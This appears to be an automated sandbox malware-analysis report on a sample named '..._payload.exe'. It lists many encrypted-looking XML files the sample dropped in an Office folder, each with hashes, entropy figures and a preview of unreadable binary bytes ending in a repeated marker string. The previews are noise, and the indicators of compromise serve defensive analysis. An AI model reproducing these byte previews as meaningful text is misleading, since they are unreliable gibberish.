                                                                                                      Preview:<?xmli.D.4.....W..7.{./y..a;$.....qt......YDaXc...O\..b.k..z.=..+;...lM2.KG...b{....N.g..X..l.O. ........F......E..2....G...:E.........S...n|`Am@8Q.1Ey...s...m.h....q.z..y.............-.).c.h. >...s..Ji..3>_GVef.Y...&...T......&..RPB...`.'.`..c.g@~.l..&.D:|.......dF.......'........'...^......OHS..K.mf.7.0j.:...x..M.N..F..j7.....Z .Z.i*..._OkV...T..P..3..x..F.W.3.MC]V...m....0wX....8...p..IAc.\B..l...'........Uy...u[.H...P.w.......+.U..zN./X,..^...x.....P.b.2.3K...1..B.....u.h..v.A..U...Wt.4;.T....yuPp.G..;M...W...Or.c]Q...wg...A.b|.n....w.j......;wNP.|....4.rR^....w.N"E+..Hm..G...n0.....Y...g u..N...6...|....Yl7........j....X@.......c1.'\f..5..w.....Xn....u..E..~.O.."....m@.@j.M.\......I..<J~..{>.^..{...}.+=2..f\.g.Q...[....a...<..U...,.f.Z@. .I..8l.$.h....G...p..l8..+.....#o... L.7....UB..8r/.#J.......v...p0%)4..8.JN...)..B..`@>}m=-g.........7h.Z...aJ>?......,Evku. .[!.SRie....../...t.I.j..c.zk..ZN.T3......*..q...f...{@.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11369v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2023
                                                                                                      Entropy (8bit):7.904342157490295
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:5wqh11CodGJvrdOdI7FXSxzUhcw0/TgbnRRec9t4UG4rgwY0WG+9ZF+QQK9wD:5YFJvJOK7FiYhOQDec9yP4kw/WzTHy
                                                                                                      MD5:98AECF904E2C7CEC9BA6D8BEFBFE25BA
                                                                                                      SHA1:1C4C41EBC04294C3BC22976A7895EAD080214F46
                                                                                                      SHA-256:688AAD2F4B37B1EC20036738A789FF6A63461C916C465EE7D5AC37D7CBF62D1A
                                                                                                      SHA-512:ED25B7982ABEE6A85332455860B7985D930831F6079AF5B88AE8098197F92DDAF6A490608A8E59A5D69B445A40EAA68E33BC55B2A89CE0FE2BFA719359DDC480
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml)Q.N.$9G@...]3Z.^:d.B.9:..z2^..*C..yP...=.(E....:;.3.u. C.D.....q..V...l@.k.y4..M:l...D.....G:.?....0.R: .JW...}.....a~...........`.^...S..-0.....$.x0_..[./.|.Yc..o(......^].!..K\Q....Am.:~......]t....X..]7.@../.=i`....8>?...R...2.d.7.$K.2........d.m[sX...........Wc...Gl........U..........K?.2..3..^.D.M...yW5.W..@.~mgJ-....G...U.@B-p[.fY.d.$.aX.*..LsD)E\.2n..6..F..9....m...U..7.sq.b...r.o..s...).....Dx...T..0.....yp..5.I:..M..]y9..xF.*..A-`...j7.ECdI..]5..6..G.B.....hf....j.G...........c.....;..P.....U..p...#y............f4.vm.G!.S.r/h.\...*q...D............0..9...W..M..FF.z....g..V.<.....w..c.{.........a...b.t.....wt..rAc....h...D..^9.q8.@U..j].t..,..R....8.;.F...u.......]s../..;_.[...g......tW..N...q5.....&..8..kQ."..',..ef.<8..Hb..f..a.#.Mk....X......}.#....Z.j....!#..1......1.._V2.E....('.....y.+.g...z.<:.F]...D.+~.6.~........j..&..DL...Q!.R..n..E].....E>>x(..3.XX.5.6..0.m.Y.%kqrx#pV.R...kz...@...C_?`T......A.R.rn..R...<..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11370v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1001
                                                                                                      Entropy (8bit):7.793920500303487
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:m/cVWAo3EJPtvOSzXnm03UfMwoFMWg68tegZHFYqv6bD:m/cVYYtvp/UkwoKWQMgZlYqwD
                                                                                                      MD5:17DD441D8398FC8FDBDEBE0C93520B3C
                                                                                                      SHA1:49F77E01250D55833047FE826832B33A9DF0786D
                                                                                                      SHA-256:5BD35C5286ADA35C5313FE2915726640BC560AAE5DCFD709BF2D4A22799A4977
                                                                                                      SHA-512:BF1A60F554DB63E66AD9F1DDC3202F551418F64C363B475C501715B90AA4B75D6BEFAF4F6A9F38122D53FA5CE556821FAF4665C852C4B7B7D3E587AFD369AAAB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...f.j.%..G.Gf3....=.;.?...e...e.:.x...&..n..(......_]4|. ...ss|(.8......9.C.`...5.p.....v..p;........ $.....@u. pS.sO.-.........PJ_.u?g..P.vq.LvB..Yk.&..K..[;AO....i%..&.O.!....=..8q..Q...'........U..$..L.Zd.':>.....x?N.N.r.......r..A{A......*.|.....A...vV@5o(-.\...J....%.Y.u;.....g.....]Ei..#*...dJ.R......X..]..._\.P.y.,H...2I.U.....{..-.....~....|.ZJ..%..&.M..O/.....c6.....v(.aa.@.oT.\...Y.n3....E8.8.....?..j.).?8K......X?w*f^^.O..8.....$.I.7.R..?.J.v^V....G.......n".4m.....%...i.~`=..Oa5\p1^\....L.....mL7.4U.I.....D...e........'.Z;...m.yb..l..g3q...W......y..s.O.a*.8..|.3...sO...G./.r......N.e_.@8..`..Z..LA.@O.i..J....B..2+.T$.SzG.J..#,...\..0.h8|..;.AdXm......`..h...C.\G.8._....W..kXU}........,.M.J..g..vM..=.+gv-O....u.....><.Y.X.!.^wNp....9M.d..:.....N...}.....!..u..0H0..z..........o&G5.*.i.nLw.a6)CH.}K...t>....G2..<o..|.b.b1....D.{(Zux`...q.X.....E....j.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11381v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2743
                                                                                                      Entropy (8bit):7.9411988043429025
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:Np0RGAk25vm0UZDHxuO/V6E4nnkUbnmlCUmCL3ujLcf07Z7wD:n0zh5vUZDHgmV6EukUbnUbL3ujLLZw
                                                                                                      MD5:5FB90B7ABAAD204596B7824329D250F1
                                                                                                      SHA1:FF76F96EBFE8F689BB54672D5136715FCE5CA392
                                                                                                      SHA-256:2AC9B0702DBCF1B44F67B391E80C9A825D8A2E39BE5C4895543348B6AF986AB5
                                                                                                      SHA-512:79FD9178DFC56A902B3B5FEDFB45A50CAFE95A8FCD95645DD305481665370B2788DE0A3E31600447AEED0BFBA234D7DAC76E9C43F5FC39AED8C605D74082CD77
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmln....0.!...J16.Z..9,R....jL.n.B.(........C..D.l.....oL...Y.u N.....%..............(+.>~F.o.h...h-....P.R...j.?`:B..-...o..2oQt.BE^......i:~.n).C...c.].v....t..v...&.._|...7l..T...j.<..]...m....K.>.w\sd.-.-.......<...l.....*.0..m(Q..2.U...b.F...Y..*..`....1..f..r.$.Y;O..bs....KQ.......pt.=..4..\.G..Kr._._....U..^N..ig.}{L......s... ..LE....5.p...s.F[.w.....u.0...v.t.[.......p..6..n.0..L.....1!...hC9_.#.n....[...DDU9A.=..K)..........$V/.Z.....OJ....H/<.....\..i...W....E..3.N|:2.s.=xxw`.J.....>..@...7......$%`.].#)Q.E..i......F.L.d..Z.j...p..@..%l@..H.'f..0{RV../.........~..*oub..G....l3A......a.......sb7.........B........'..,%...].XB..idBp...!..n.%{0.(j.(..V-N.2...YO...!..z..c8Z.p..M.jEY`..;...m .....6..b"}i8.S....$#.j.g.#uju.w.E....:Wv#`..Z...@....)X=..G.....B...I{ycL.....)9X...T.YM_x3....:..}.....s....fpC........x ..i..F.}\}.G.'@........t..'q/..+k.(X...\.<?.e.!...yz.{.)X<!..I'c.0x....N..$a.."$..OZ8._#.x...i...4..4.U.V....a..hL.p.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11446v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):11063
                                                                                                      Entropy (8bit):7.98236120580977
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:us6Falu0ih3QpZKqfukwu8PHp5G3noTHJxd5mlFj3NljjnguMdUujCFFbB3m:Naa40iwDfukpqJ5GXoTpXmtfne/jwFI
                                                                                                      MD5:7E6BE8F60C5D40EA2D6FA4ECC0E851AF
                                                                                                      SHA1:9B6EA33816B9F14C2411DD3175094495E9C8A49F
                                                                                                      SHA-256:B616E660D91724C0F7F631FD223194BBD39CC293F6F7032A289D72A967285234
                                                                                                      SHA-512:058AA3BD69956CBC8B69B1A00410A45BC761EC0410F2C519279D432CD3DFBB37D5D1BEC6BEFB2F3470F007720F01D9E639D7284522EB20589B8404EC705570B2
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.c..@...;.....~. 8$.-..6#....Yb...L..I...u......$.u.w.....@3K0..kL...,..j..T....@iU...m.~....%..Z......w.O...z......c..D...>...|.f?...&.M..K.*.$...X.B...0p..Ao...dJ..i..u1.;..hV4&...T7.V.D;...'"c..}.i...M.......(.../.$.vJ.c....#B..|.gs.U..t!.h.....1..$8.st..6+ok..{.P..Q..4.KC..;.PP^.OxT...e.%..K....V..Q..).+......+;.2.....4..e....&..T8...\-r.~....J.. .i......H.j.U.{"..7T.s..zw.L..6.&....J..y&...5....I.v....U..v..Jx.J.I\.....x..+R.cx0...#_?~..!T.h...~..x..Tb..P.......<.G.. t...=..8P:....j..A.:h.1E..9Dg....I...7?.......o..M.>..'.A....yh.^.64.....<..<._ .O..6..30,..7.|....\....0ZzO.^..Y5V..j.J...5.=..C.t.#...d......<.I~..z.:c.L.X..4.xRP..J}S..L....+xR.t=..c....D...."....8u...3e..%^.N1..C..'V...F.h.i.(@Q....c.9..}p...)..a.X...6...Kp..sky...*e.v.{.dOA..].a.<|.kn..Y........Bq..F._{2i.=x....q.HJ...~s:M./.;.S...-3...-.*......^..........R...._.@w...o.>.....\.vQYA.3....!..|....q.H>.J...T..U....6.##H..Z.......g@..9..'S..>zt...@....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11464v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):807
                                                                                                      Entropy (8bit):7.7421424284691645
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:u/ETYlZZHfBFKuJfNqZ9ZuCv9yfCDxkcPvKnv6bD:slZZHfBgG09Zu46Cr0wD
                                                                                                      MD5:E2802D8762E27B8900DD1CB37A82A21E
                                                                                                      SHA1:6F3A20488C2C807CD5F9277F5F05F506CA6B3378
                                                                                                      SHA-256:40A99AD5E77F57BDCC605B165D76645F659EEE40427035FB911BDD536A5E6F65
                                                                                                      SHA-512:349B90B2AEBDCA7EB7C1E877B73D0256C79A65469B8C0180282F78BB4CC707F6DE7D5DEFFA57B07EE17E855B9AB4D265DE62DADFB20BA05447B7A400B0394F0E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlD[.B.5Rh...R.P...M..x%a.~.........gz.O...2.dI..>..c.&l.3.B.v.lv....nw....Cn....t......|.....=.5...&.Ry.V..C.{_....P.Y..."..s...=......A.......Vg.[%l].<N$NN......|.].i..d-.X.....E..ALa..X.c.'..pP0.w.3IF>.`...y...:...OO...~M..../!.:..X._.2*...I.g..~s.....C...|.=..w".V...:.....6[.D.c..#%w.,../f.!".|.t.%..n=.j..v.......4.).%y&'....N........@.;.\...|.?.!g......Xx...GX.h..4.2.q...^x.IR.b....v5j....[.s...#....wM......WI.<....V.,pe,.L..a?Uij9s..L.Vhf_...v MG.....2....XV.D.wQ.z.;.+..A(.G....Cb.D...[.....'$..Z...o/4..8.....{...;..\.Z..q.......;..X....S....1.A..~.*.FS..;PU\^.....')k.5.c44o.Ov..;...-...3K.b..A..l. #r..J.....N_.. ..w..)qwlT.L....X.K.hZ...-b.U..SQA......j.+..r..KX....*hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11498v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):747
                                                                                                      Entropy (8bit):7.689884978495449
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:cbhTnvkA2QW2MK95aqlIo1APEmWqdMBl9XKv0PVXyJH8IApEe/Tfv6cii9a:kbMK955lT1bNl9XZPm1ApEefv6bD
                                                                                                      MD5:9234B5737CC6F92F5294052690D17049
                                                                                                      SHA1:9E3867539EEFA9D9F769974D986CBCAF8058D80B
                                                                                                      SHA-256:122E6AD22D6D1FB0379004303586F8DE83FEFED1191207E0FDD35E3A8A425DCF
                                                                                                      SHA-512:C7C67C9309B644087CFB9FB9E6547AD3C1BE83845D95F5726D5059C5BD3CDB4D8E24CDD05825C8F3EAD6FF4D6E369006497D7B92E72A15C2137757308D822AE9
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...s.Is...F7..dH.'...v....w...8-...8\..G.H....wB.}.....&.<..;...Ks....ikqA..w./..V#.?m1..h}..i.`....[.....7..P..L.UB......o..`.~..c..Y.F.2..Z............._..`....s. 3.9.x*t..........W.../&.;..b..... ..<..g.S.E@.dZ....0.3........c.....E..*E....!...b.s.7] mi....v.h}.....,}&._y.t+d;.c...%.z.o..<..H....{'3....}R)...,..|...E.el.O.$..9.../........Q.....)$..B.:a....6A.FFa.K'.|.tIk......2..@./.....:@...@.3...-U}......y1 .....@D...np..4E....=....7.k[Q..-..T..|.......2m.._9.2.'..*!W.s}.=d~=.NO.....\.H....Z....`H..^..2......qL=..Z.&RL.>z....+...?...8~......dc...tMO...=.4A.A..d:..0N...f1.i?w&x.|..@....g."..r..:M.2.,..y#gu..n.P....W@..-C<u.......hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11499v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1786
                                                                                                      Entropy (8bit):7.891879819720495
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:b/1jxCmAW/WAxIqz66v/UY2vOalAqaemwyCwP0X11ScTjJpPY6cCB3QB4YnovCkK:xVijavXwyfjwyruZYC5UPkyJywD
                                                                                                      MD5:CB92DEE5FCB6345605EE9042EB3001B0
                                                                                                      SHA1:B068B8221DB37D08DE7986B194A27586F51C99C5
                                                                                                      SHA-256:D86DBD36C95D200C21FCCB795D11358A4C73C93AF53E730B2EF7F62F25F3DF7E
                                                                                                      SHA-512:DFE322B9082E51ACD51A33602AC0E199E6433C77B66BA2F3A0775E071EE4A12E2208F15C482DFFEA1E24348BB23DCABD7CF9B07E29ACD9CB1FFE1CA3646C1694
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.a......^r..l{...<...T..../i.....M.V=3..7.C ........$.O....}........J5>:}.Cf ...s..N.n\d.......:...........(K.S...pm....f..@.%.h.%RA:..GVIG.g.........o9.AZe..y....V.;...^.`b......1o..+.......5.qz.....@_}.b.P_..x@.....`95.m...eE(w..h./..E..by....{.j...u..}9:# ..`.li+-.u..B~....../.%3...b.....ng7.>.'....e....{`.m.wiO.........S>5.u........Is...=..{r...D.._..)8...=.....".N...v@...bU!u.A....-.^..tH.L..%i.W~8...D.[...w.X.v.}h...S.5...4..f.)....,..2I>.?.'..,....).Up...d..Z.m!.@Al.O....>.w.P}>/X.i... x..)yF....b.....b&.y.&......^.9..t.KW).1./JuE ..8r....>.?8..U..m=.._.....U...Z:.h..'..... ..p..5.#.x.)./}J..U..zw.}...l#.q....89.a...d..r.I:o:..*..:.d.jA..Z..N.wjD....vo.?....yko....7..*:..Z.hT$...Oo..t..,.Vo.jq\sH..4....|.....%.....Y.....\.#.\..).+......*..DtH:....gc8po.....:M...(t[P.+..>....Q...,l..A....v...j......6A|Q...T......g.;..A/.{.....}lX.m.U...7+.....H...X?seF..s...O\..EF...Y;.q..........F?.^Y..S...i.".n:.*.h.D?j.3.Dn.99...!z..DL.(.$Oj...hk`

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11500v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):886
                                                                                                      Entropy (8bit):7.760112250120727
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:YmGjsbo5I1drFmR04jHmPX1hAjSs84YFQiY3en7XGmNc6gqv6bD:fGAuhGPzAjBUFQiY3enbGmGqwD
                                                                                                      MD5:32FE24C0D6DC3A6069F6C2124E2AE1AE
                                                                                                      SHA1:BDE23ACA234CBF7A50141EA3DD30C5DAC347BED1
                                                                                                      SHA-256:C02769DF655833207A41A466DD7C42E8EA34A4606D8F9625EEFC31C9ED26D852
                                                                                                      SHA-512:3A563C0D7BF10CCDA2451FF500FFD139F27CAFD5D2A13628EEB78C0EEBC96F69E1C92AEFB107E77DB07ABADFBD437C445BF1C0968042DF4CB1F59DC27E9B4E88
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmle..."..3.<t]E..).)Y....lC..Y.]r.G.v....0`&.....|.1..........u.t.3D;I.d]P.^1#.Q....!@..7....=......H..I...6. ^...........1.9.......:._...B.?..U..E.Vm-K.JE.....!IG.C5.."[i.-dR.]=..|..,...q....|.'xe...2...v.W..T.=o.O...:....53.D.SR.Tc..C..h.......z?k...Im7.'7...al.......~.j......&Z....].+f..R.&.U....g...upei..q8.?...._O.L9.CY....C.gR6..Q.....o..0.E..(.r...... ..`&.^..xY.KDc.t.@....M....t^.;c..}.y..$.v.?.H{t1..,...tO-S."..?..&....7/.....m2.Y.j.t..n.....TX...k.Y..|.a.mW...l.*&...j...D..cfQm>.E.....@M2d.!..x...y=.N...HEP.2.4...u.E...f.w+n.(..`.hn<...%.(....;D)E.v=..J5q.s.X......(2._I.R....#.~.....BP..{...."2p... .....l-f....F.q...e....*..~.)\~...N.........Y.......frN5.8}/.......DHu6:..$a...........'..8...Q^...s ..#'.q.....nF..v..c..BU...`.........N.{....Z.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11502v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1324
                                                                                                      Entropy (8bit):7.81759219507558
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:DyxRhzTbN/U+oOhr2WPXg7Bo1X2j0WIjnEClSZ+uOPT9qlgTSAhv6bD:Dyx3l/IJN7BomInECSYuOPT9wZywD
                                                                                                      MD5:86F1764387AD37A55098F7C89CD8BB5D
                                                                                                      SHA1:509E423161A51612B84A6EE1A7379F8BC3B8FCAF
                                                                                                      SHA-256:B4EB5AA3AD7016F2619FBC63DD4BDA89BA6A7F7A6611C1FC9BD0DECF699AA63D
                                                                                                      SHA-512:A97308567E636D8874C4BC9535CDFAD2DFD4713F9AAACE0832696C94A290C8289C467B6D71ACD8C0BD436E0908C65FF1E675D7BA4EB7B3C4B8B0F6406386FBFC
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.e...7F7.....H.3Lz......UV...Fl..5;.k.m..|.R`.M}T.....<8......(....xD..aB.s..lK.n...x....9.q5V.....rl.i..1.....2.K~0.d\=...&s.}...k..#.~g.....*.4...sh.1.[M....Ai*k.........*.^.J.Hd...6....O..y..rE.=.&..=..|^)c.,..:.S..`.?P.st{$...x..e.mbZ..b.4.C..s'UP..E._....L...X6[j..!.. Ou...#;.W..vEE....(....!.8.p....,....mod.x..v.-[.t.KM.....{|.u.@].\<......i....Z.\.G"".U...<.Wd.C&..y..H....l-27.lX.3......6-uW'...2.e....=.>v.5.+.:...{...o...}..`....Sl~a.|..._|...I...=.J...l.....^........~...V4~....I..|..a..i....SZ.P..A.5.v..m.@..3.^_..Gl.l.,...e....DG..=......b..XV..>d9.....)j...f>A..'...R...*..j....=.3....-...U............N.&Rd....B:|.%R(s=.........7ZM..G2$..A.C.)...m...L..W.;R..1...w...7.VsT.qF...1..p..+.-e..n...^7]...T..y...f..R..B..oI..&.3A...@...=.....(jE.P.kx..C-...D@.}.^:*.......;...)p.)....f.u.[L.Vi._.}.C.T.6m.s1_....vc3j.k.W.c.S.9.L.]k/^2l.Q.;..f0s.M....I..rs.H....Cxf}jO.Bb........62.2...#.;.....[.*.52.7...7.%.-_p...!..i..]on.(...B.#.v...8:

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11504v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1435
                                                                                                      Entropy (8bit):7.875905591707585
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:M4sIhvq2jA0omv2l68mYI2/QdkekpAgqLmB8OWk+MzqsqZCR7NBFE3mUkOaKKmeA:My4p0oS2lNYdkekpOLBAnzTNFE34Oa+1
                                                                                                      MD5:E868C2F12E4340081C9A104FEA2AF6CE
                                                                                                      SHA1:0643698BD1075AE448E208B6179A9762EDC5789D
                                                                                                      SHA-256:3A88F66D08F8E65BCA47DB6ACC8E3D819ED3EBFEA660D948440527BF28CA8AE8
                                                                                                      SHA-512:29A0DEFDF7340F88A1714339D8BE5178D17E52F4207B3F50D6D88F0096932120BCAFC1EB8CB720B14A2371AB74F9B4D4425A10429A8063BBF457DCCA64FDE63A
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlt.=P.l)qy.N.#....3...l`.f..c....$...V5...]r.......fp.W.{.....#v....]..'W.H...uQ.m...].z.]aSh..`.h..v|/a......=|..(....3.y9.oo.V..i..1;._.....!...m[_a.:A.0..l.2.....|.n.cs.....f...0.#.,8.r.....H..i..6.;....|... ./_..$ Y..fx....7....{..&...h...C..u..IT.U..J..T...R.Z....f...5....s..}R....-...........l{..n.m}....b]j..+....$.Op.e..Tfb..u.U..vH..R..l....C. ...=.8Lm......../.@...)..@.........7o8...%]..X..8.p.H...P..gj.i.M.....\.........m*R(.`D; .b.r....XN^....{Bio6$(Atm#..{...hV..Yai'+Uv..#@F...UK...Q........W.*........Xk.P.}....5.[..&H........R.5.."q..@..[.._..sr#....r^.$;..G...~.s.Ei9$T..A.!e.LRU..j7..;.-...gcx.....Ok.....4.."..#n.(;}...L....Cwu#.%.G..BRA.p&..y2. ,.`...Ms.....ci.q..%8.a.% Tq..&UH....ok*.t1..1...n.n5.\f...oZ.=..^...W...S..>...M....l........5.,...9.}/.@Rv.o.,.^.@.....j ....)=...z~-....u....7C.......{.4....l...mP..8......sq%fOK@.3..5..^...@..zAL.....)P..^Q.~h1n.3.........g..D+....RMi.n........H......4..T..&u|.....>Y...5

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11514v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7119
                                                                                                      Entropy (8bit):7.973254073046899
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:nD3jgIfPMWHDtWRuJoPJgFFpIsf8a83mjx:nD3jgIHNH5CWFTxBx
                                                                                                      MD5:FF0FB321F609EC6633C5D223DE1E917A
                                                                                                      SHA1:A89B8E12C0A8D0C866BAB430DEEBE8227163F344
                                                                                                      SHA-256:BF006C38C61F391D8EE1DF2AE4BDD38D0610E8EFB7F4305C15AFFD43D2DD1189
                                                                                                      SHA-512:AD82D006FCDC2C6D3DAF5ED0E0824466832624FCAC11FECB6C8DB6145E22F6BC46A0645CEA650BC9C9646B33316F8205BBE1A8EED97EA55F2C230B28EAB85228
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml!E.7..7T_....3.<ju.1F..I........g}t.T.i.i.Z..|......G!....g.."[Ux...).1'.u.j$I..{H.9c.5C'..wa....>...+....P/.@..]..*..h.=B..Yf3...2o...>...=.f.}d..h`.).-...U..0...b'...\....*....V.$.;.=.kX...v}.T.W...K./..]......p1,....XFW.e....%.H....:.e.B....P...O=h.......qvK.6g..H_..M......6.a_..)....F?...{.S.._..`~+..].C...rd......3&,.....h%.%...t..Jp.......<.`z..z.r.-...ef.....wEfGm.^.$../.l.+.....u.i.....K..c.x.$..aV$...O.B.Za..<,...98....>........q.4......f..n.Gi..a.........@Q..$...x.l3...Z7.. ....f.e9?F....C.....1dl-p...A..`..k.u9K..]dh....v....H.....!.,....)..q...0......nua..~#]......~kZ.K..M..<.I..JgV........a.y!j.ilx..yqp^.N.zWr....xC3.A........L4....v.m...jk...$e.)s.....@r............. .x......@.K~..L...l+..!X..asB...<.=...H...Pc...L(..3b,).....;....g?.X.o...6f..C...2m.3Z..$C*....k .....!.%7N..d.(.s.]..2.V...no.v.....E,.B.\.p.S.G.Q<.i..UJ(..L..;.`zNB..X.....W..nq~y........n/L..f....U....X.bYs...'.........I....=N.<N....N.U

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11659v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):762
                                                                                                      Entropy (8bit):7.760913963951695
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:UlelfoHH083W+ygkH5GAsDQUUR5Rp2V+ow8X9J0DN8nUrRN9iujinv6cii9a:yOfonOkZQUKKX/6NprRNwujinv6bD
                                                                                                      MD5:35D9E57AB2B0588C4A8DB5AF04A1EAEE
                                                                                                      SHA1:F6479540EF0B00CC6488E8E0F2F89AFD542FA12E
                                                                                                      SHA-256:DDCC1C0BEB9D2D85389815D7847F118C31C8AB4C0FA1A162F14752F6594E7EFC
                                                                                                      SHA-512:1DDC8D0C1B82D863910F785491FEB5374C92FC5E226A8C06BD6FA65A5DA8171AD386F1EE83789AE8B603C6BBBB6942C77A3B0F2F04380A40200251FBD5EBE6A2
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..a/j...dl......b..]9....B7..Q..8-.@qp..[...]R_0.].s.(.......`(V.ZMY...6t.....6.M...z.?.p.....P.(eW.~".L....R..f..H.M9e.Y.{Z........cn.a.#P5).H.Wo.~.a..0G..L.b....4..".~aS..b0......C...wV.,.....PZ./06.....{;......_..!.......f..7..x.`[...~)'...8..f.XP.. ......fZ...eli.'..W..^.z(~o..:e..pR.'.....".Mr..I..>..E9#=.K..kH....&o..X.P.p.......lR.F}.j..>'.r.#92..[....H...3.Z.i(...x.C....j..s......^?....:..".L..k.r...N9.59.K.p~g.7+.E......E....8....g.r..T........U..7]U.wP&.f......T..E..U%..F.*.&.d..I...hi......i.m^+gq7.b.....8........%....,.;..)...*...89...J..W..i.:u/}./.m..b....fGj.3...=:7o>%.p......./ ...X..a,_...LO..5..I...p..+[.;0..:...`..ZhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11701v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1463
                                                                                                      Entropy (8bit):7.83854765479865
                                                                                                      Encrypted:false
